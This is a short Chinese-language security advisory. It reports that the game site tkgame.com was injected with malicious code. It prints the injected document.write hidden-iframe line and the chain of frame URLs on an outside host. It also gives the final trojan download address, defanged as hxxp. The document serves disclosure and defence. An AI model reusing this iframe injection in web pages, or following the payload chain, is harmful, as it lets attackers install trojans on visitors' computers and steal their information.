天空游戏宝典被植入恶意代码
天空游戏宝典(hxxp://www.tkgame.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:hxxp://download.tkgame.com/img/nav_over.js
网页被嵌入恶意链接代码:
document.write (”<iframe src=hxxp://www.19099.com.cn/bao7/y.htm width=50 height=0></iframe>”);
挂马分析:
[script]hxxp://download.tkgame.com/img/nav_over.js
[frame]hxxp://www.19099.com.cn/bao7/y.htm
[frame]hxxp://www.19099.com.cn/bao7/index.htm
[frame]hxxp://www.19099.com.cn/bao7/yy.htm
[frame]hxxp://www.19099.com.cn/bao7/flash.htm
[frame]hxxp://www.19099.com.cn/bao7/ippp.htm
[frame]hxxp://www.19099.com.cn/bao7/ip.htm
[frame]hxxp://www.19099.com.cn/bao7/02.htm
[frame]hxxp://www.19099.com.cn/bao7/lz.htm
[frame]hxxp://www.19099.com.cn/bao7/office.htm
[frame]hxxp://www.19099.com.cn/bao7/pef.htm
[frame]hxxp://www.19099.com.cn/bao7/qb.htm
[script]hxxp://count1.51much.com/cnt.php?uid=ua-1-13313&style=text&text=.
最终下载病毒文件:
hxxp://www.23899.com.cn/bao.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
为防止病毒二次传播链接hxxp部分被置换为hxxp
关键字:恶意代码
